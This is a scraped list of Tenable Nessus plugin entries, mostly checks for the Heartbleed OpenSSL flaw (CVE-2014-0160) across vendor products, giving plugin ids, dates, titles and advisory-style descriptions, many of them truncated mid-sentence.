Windows NASL id HP_VCRM_SSRT101531.NASL description The HP Version Control Repository Manager (VCRM) install on the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 77025 published 2014-08-06 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/77025 title HP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed) NASL family CGI abuses NASL id WD_ARKEIA_10_1_19_VER_CHECK.NASL description The self-reported version of the remote Western Digital Arkeia device is prior to 10.1.19 / 10.2.9. It is, therefore, potentially affected by the following vulnerabilities : - An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 74262 published 2014-06-02 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/74262 title Western Digital Arkeia 10.1.x < 10.1.19 / 10.2.x < 10.2.9 Multiple Vulnerabilities (Heartbleed) NASL family Junos Local Security Checks NASL id JUNIPER_JSA10623.NASL description According to its self-reported version number, the remote Junos device is affected by an information disclosure vulnerability. An out-of-bounds read error, known as Heartbleed, exists in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content. Note that this issue only affects devices with J-Web or the SSL service for JUNOScript enabled. last seen 2020-03-18 modified 2014-04-18 plugin id 73687 published 2014-04-18 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73687 title Juniper Junos OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed) NASL family Windows NASL id HP_VCA_SSRT101531.NASL description The installation of HP Version Control Agent (VCA) on the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 77024 published 2014-08-06 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/77024 title HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed) NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-2165-1.NASL description Neel Mehta discovered that OpenSSL incorrectly handled memory in the TLS heartbeat extension. An attacker could use this issue to obtain up to 64k of memory contents from the client or server, possibly leading to the disclosure of private keys and other sensitive information. (CVE-2014-0160) Yuval Yarom and Naomi Benger discovered that OpenSSL incorrectly handled timing during swap operations in the Montgomery ladder implementation. An attacker could use this issue to perform side-channel attacks and possibly recover ECDSA nonces. (CVE-2014-0076). last seen 2020-03-18 modified 2014-04-08 plugin id 73402 published 2014-04-08 reporter Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73402 title Ubuntu 12.04 LTS / 12.10 / 13.10 : openssl vulnerabilities (USN-2165-1) NASL family SuSE Local Security Checks NASL id OPENSUSE-2014-398.NASL description - tor 0.2.4.22 [bnc#878486] Tor was updated to the recommended version of the 0.2.4.x series. - major features in 0.2.4.x : - improved client resilience - support better link encryption with forward secrecy - new NTor circuit handshake - change relay queue for circuit create requests from size-based limit to time-based limit - many bug fixes and minor features - changes contained in 0.2.4.22: Backports numerous high-priority fixes. These include blocking all authority signing keys that may have been affected by the OpenSSL last seen 2020-06-05 modified 2014-06-13 plugin id 75376 published 2014-06-13 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/75376 title openSUSE Security Update : tor (openSUSE-SU-2014:0719-1) (Heartbleed) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-2896.NASL description A vulnerability has been discovered in OpenSSL last seen 2020-03-17 modified 2014-04-08 plugin id 73388 published 2014-04-08 reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73388 title Debian DSA-2896-1 : openssl - security update NASL family CISCO NASL id CISCO-VCS-CSCUO16472.NASL description According to its self-reported version number, the version of Cisco TelePresence Video Communication Server installed on the remote host is affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 74010 published 2014-05-14 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/74010 title Cisco TelePresence Video Communication Server Heartbeat Information Disclosure (Heartbleed) NASL family Windows NASL id ATTACHMATE_REFLECTION_X_HEARTBLEED.NASL description The Attachmate Reflection X install on the remote host is affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 74186 published 2014-05-27 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/74186 title Attachmate Reflection X Heartbeat Information Disclosure (Heartbleed) NASL family Misc. NASL id VMWARE_ESXI_5_5_BUILD_1746974_REMOTE.NASL description The remote VMware ESXi host is 5.5 prior to build 1746974 or 5.5 Update 1 prior to build 1746018. It is, therefore, potentially affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73917 published 2014-05-08 reporter This script is (C) 2014-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73917 title ESXi 5.5 < Build 1746974 / 5.5 Update 1 < Build 1746018 OpenSSL Library Multiple Vulnerabilities (remote check) (Heartbleed) NASL family Fedora Local Security Checks NASL id FEDORA_2014-4879.NASL description pull in upstream patch for CVE-2014-0160 last seen 2020-03-17 modified 2014-04-09 plugin id 73429 published 2014-04-09 reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73429 title Fedora 20 : openssl-1.0.1e-37.fc20.1 (2014-4879) NASL family Fedora Local Security Checks NASL id FEDORA_2014-5321.NASL description New upstream release Supports OpenSSL DLLs 1.0.1g. Fixes to take care of OpenSSL,s TLS heartbeat read overrun (CVE-2014-0160). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-17 modified 2014-04-30 plugin id 73775 published 2014-04-30 reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73775 title Fedora 20 : stunnel-5.01-1.fc20 (2014-5321) NASL family Windows NASL id VMWARE_PLAYER_MULTIPLE_VMSA_2014-0004.NASL description The installed version of VMware Player 6.x running on Windows is earlier than 6.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73672 published 2014-04-21 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73672 title VMware Player 6.x < 6.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed) NASL family Mandriva Local Security Checks NASL id MANDRIVA_MDVSA-2014-123.NASL description Updated tor packages fix multiple vulnerabilities : Tor before 0.2.4.20, when OpenSSL 1.x is used in conjunction with a certain HardwareAccel setting on Intel Sandy Bridge and Ivy Bridge platforms, does not properly generate random numbers for relay identity keys and hidden-service identity keys, which might make it easier for remote attackers to bypass cryptographic protection mechanisms via unspecified vectors (CVE-2013-7295). Update to version 0.2.4.22 solves these major and security problems : - Block authority signing keys that were used on authorities vulnerable to the heartbleed bug in OpenSSL (CVE-2014-0160). - Fix a memory leak that could occur if a microdescriptor parse fails during the tokenizing step. - The relay ciphersuite list is now generated automatically based on uniform criteria, and includes all OpenSSL ciphersuites with acceptable strength and forward secrecy. - Relays now trust themselves to have a better view than clients of which TLS ciphersuites are better than others. - Clients now try to advertise the same list of ciphersuites as Firefox 28. For other changes see the upstream change log last seen 2020-06-01 modified 2020-06-02 plugin id 74481 published 2014-06-12 reporter This script is Copyright (C) 2014-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/74481 title Mandriva Linux Security Advisory : tor (MDVSA-2014:123) NASL family Misc. NASL id HP_ONBOARD_ADMIN_HEARTBLEED_VERSIONS.NASL description The remote host has version 4.11 or 4.20 of HP BladeSystem c-Class Onboard Administrator. It is, therefore, affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 76509 published 2014-07-15 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/76509 title HP BladeSystem c-Class Onboard Administrator 4.11 / 4.20 Heartbeat Information Disclosure (Heartbleed) NASL family Windows NASL id WEBSENSE_WEB_SECURITY_HEARTBLEED.NASL description The version of Websense Web Security installed on the remote Windows host contains a bundled version of an OpenSSL DLL file. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73759 published 2014-04-29 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73759 title Websense Web Security Heartbeat Information Disclosure (Heartbleed) NASL family CGI abuses NASL id BLUECOAT_PROXY_AV_3_5_1_9.NASL description According to its self-reported version number, the firmware installed on the remote host is affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 74037 published 2014-05-16 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/74037 title Blue Coat ProxyAV 3.5.1.1 - 3.5.1.6 Heartbeat Information Disclosure (Heartbleed) NASL family Firewalls NASL id BLUECOAT_PROXY_SG_6_5_3_6.NASL description The remote Blue Coat ProxySG device last seen 2020-06-01 modified 2020-06-02 plugin id 73515 published 2014-04-15 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73515 title Blue Coat ProxySG Heartbeat Information Disclosure (Heartbleed) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2014-0378.NASL description An updated rhev-hypervisor6 package that fixes one security issue is now available. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which corrects this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 79006 published 2014-11-08 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/79006 title RHEL 6 : rhev-hypervisor6 (RHSA-2014:0378) (Heartbleed) NASL family Misc. NASL id MCAFEE_WEB_GATEWAY_SB10071.NASL description The remote host is running a version of McAfee Web Gateway (MWG) that is affected by an information disclosure vulnerability due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. last seen 2020-06-01 modified 2020-06-02 plugin id 73836 published 2014-05-02 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73836 title McAfee Web Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed) NASL family Windows NASL id IBM_RATIONAL_CLEARQUEST_8_0_1_3_01.NASL description The remote host has a version of IBM Rational ClearQuest 7.1.1.x / 7.1.2.x prior to 7.1.2.13.01 / 8.0.0.x prior to 8.0.0.10.01 / 8.0.1.x prior to 8.0.1.3.01 installed. It is, therefore, potentially affected by multiple vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that allows nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 81782 published 2015-03-12 reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/81782 title IBM Rational ClearQuest 7.1.1.x / 7.1.2.x < 7.1.2.13.01 / 8.0.0.x < 8.0.0.10.01 / 8.0.1.x < 8.0.1.3.01 OpenSSL Library Multiple Vulnerabilities (credentialed check) (Heartbleed) NASL family Fedora Local Security Checks NASL id FEDORA_2014-5337.NASL description New upstream release with following important changes : Supports OpenSSL DLLs 1.0.1g. Fixes to take care of OpenSSL last seen 2020-03-17 modified 2014-04-30 plugin id 73776 published 2014-04-30 reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73776 title Fedora 19 : stunnel-5.01-1.fc19 (2014-5337) NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2014-0376.NASL description From Red Hat Security Advisory 2014:0376 : Updated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. last seen 2020-06-01 modified 2020-06-02 plugin id 73395 published 2014-04-08 reporter This script is Copyright (C) 2014 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73395 title Oracle Linux 6 : openssl (ELSA-2014-0376) NASL family Misc. NASL id MCAFEE_NGFW_SB10071.NASL description The remote host is running a version of McAfee Next Generation Firewall (NGFW) that is affected by an information disclosure vulnerability due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. last seen 2020-06-01 modified 2020-06-02 plugin id 73835 published 2014-05-02 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73835 title McAfee Next Generation Firewall OpenSSL Information Disclosure (SB10071) (Heartbleed) NASL family Web Servers NASL id OPENSSL_1_0_1G.NASL description According to its banner, the remote web server uses a version of OpenSSL 1.0.1 prior to 1.0.1g. The OpenSSL library is, therefore, reportedly affected by the following vulnerabilities : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73404 published 2014-04-08 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73404 title OpenSSL 1.0.1 < 1.0.1g Multiple Vulnerabilities (Heartbleed) NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201404-07.NASL description The remote host is affected by the vulnerability described in GLSA-201404-07 (OpenSSL: Information Disclosure) Multiple vulnerabilities have been found in OpenSSL: OpenSSL incorrectly handles memory in the TLS heartbeat extension, leading to information disclosure of 64kb per request, possibly including private keys (“Heartbleed bug”, OpenSSL 1.0.1 only, CVE-2014-0160). The Montgomery ladder implementation of OpenSSL improperly handles swap operations (CVE-2014-0076). Impact : A remote attacker could exploit these issues to disclose information, including private keys or other sensitive information, or perform side-channel attacks to obtain ECDSA nonces. Workaround : Disabling the tls-heartbeat USE flag (enabled by default) provides a workaround for the CVE-2014-0160 issue. last seen 2020-06-01 modified 2020-06-02 plugin id 73407 published 2014-04-08 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73407 title GLSA-201404-07 : OpenSSL: Information Disclosure NASL family Misc. NASL id JUNOS_PULSE_JSA10623.NASL description According to its self-reported version, the version of IVE / UAC OS running on the remote host is affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73688 published 2014-04-18 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73688 title Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed) NASL family NewStart CGSL Local Security Checks NASL id NEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL description The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssl packages installed that are affected by multiple vulnerabilities: - OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an error state mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected. (CVE-2017-3737) - There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository. (CVE-2017-3738) - There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL before 1.0.2m and 1.1.0 before 1.1.0g. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. This only affects processors that support the BMI1, BMI2 and ADX extensions like Intel Broadwell (5th generation) and later or AMD Ryzen. (CVE-2017-3736) - OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d allows remote attackers to cause a denial of service (infinite loop and memory consumption) via malformed ASN.1 structures that trigger an improperly handled error condition. (CVE-2006-2937) - OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows attackers to cause a denial of service (CPU consumption) via parasitic public keys with large (1) public exponent or (2) public modulus values in X.509 certificates that require extra time to process when using RSA signature verification. (CVE-2006-2940) - Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. (CVE-2006-3738) - OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8 before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents OpenSSL from correctly verifying X.509 and other certificates that use PKCS #1. (CVE-2006-4339) - The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference. (CVE-2006-4343) - The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys. (CVE-2007-3108) - Off-by-one error in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8f allows remote attackers to execute arbitrary code via unspecified vectors. (CVE-2007-4995) - Off-by-one error in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f, might allow remote attackers to execute arbitrary code via a crafted packet that triggers a one-byte buffer underflow. NOTE: this issue was introduced as a result of a fix for CVE-2006-3738. As of 20071012, it is unknown whether code execution is possible. (CVE-2007-5135) - Double free vulnerability in OpenSSL 0.9.8f and 0.9.8g, when the TLS server name extensions are enabled, allows remote attackers to cause a denial of service (crash) via a malformed Client Hello packet. NOTE: some of these details are obtained from third party information. (CVE-2008-0891) - OpenSSL 0.9.8f and 0.9.8g allows remote attackers to cause a denial of service (crash) via a TLS handshake that omits the Server Key Exchange message and uses particular cipher suites, which triggers a NULL pointer dereference. (CVE-2008-1672) - The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377) - Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378) - Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate. (CVE-2009-1379) - The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post- renegotiation context, related to a plaintext injection attack, aka the Project Mogul issue. (CVE-2009-3555) - Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678. (CVE-2009-4355) - The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors. (CVE-2010-0742) - RSA verification recovery in the EVP_PKEY_verify_recover function in OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other applications, returns uninitialized memory upon failure, which might allow context-dependent attackers to bypass intended key requirements or obtain sensitive information via unspecified vectors. NOTE: some of these details are obtained from third party information. (CVE-2010-1633) - Multiple race conditions in ssl/t1_lib.c in OpenSSL 0.9.8f through 0.9.8o, 1.0.0, and 1.0.0a, when multi- threading and internal caching are enabled on a TLS server, might allow remote attackers to execute arbitrary code via client data that triggers a heap- based buffer overflow, related to (1) the TLS server name extension and (2) elliptic curve cryptography. (CVE-2010-3864) - OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier. (CVE-2010-4180) - ssl/t1_lib.c in OpenSSL 0.9.8h through 0.9.8q and 1.0.0 through 1.0.0c allows remote attackers to cause a denial of service (crash), and possibly obtain sensitive information in applications that use OpenSSL, via a malformed ClientHello handshake message that triggers an out-of-bounds memory access, aka OCSP stapling vulnerability. (CVE-2011-0014) - crypto/x509/x509_vfy.c in OpenSSL 1.0.x before 1.0.0e does not initialize certain structure members, which makes it easier for remote attackers to bypass CRL validation by using a nextUpdate value corresponding to a time in the past. (CVE-2011-3207) - OpenSSL 0.9.8s and 1.0.0f does not properly support DTLS applications, which allows remote attackers to cause a denial of service (crash) via unspecified vectors related to an out-of-bounds read. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4108. (CVE-2012-0050) - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. (CVE-2012-2110) - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1.0.1f allows remote TLS servers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Next Protocol Negotiation record in a TLS handshake. (CVE-2013-4353) - The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. (CVE-2013-6449) - The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l and 1.0.1 before 1.0.1f does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context and cause a denial of service (application crash) by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c. (CVE-2013-6450) - An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) - A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566) - A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183) Note that Nessus has not tested for this issue but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 127201 published 2019-08-12 reporter This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/127201 title NewStart CGSL CORE 5.04 / MAIN 5.04 : openssl Multiple Vulnerabilities (NS-SA-2019-0033) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2014-0396.NASL description An updated rhev-hypervisor6 package that fixes one security issue is now available for Red Hat Enterprise Virtualization Hypervisor 3.2. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Important: This update is an emergency security fix being provided outside the scope of the published support policy for Red Hat Enterprise Virtualization listed in the References section. In accordance with the support policy for Red Hat Enterprise Virtualization, Red Hat Enterprise Virtualization Hypervisor 3.2 will not receive future security updates. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to 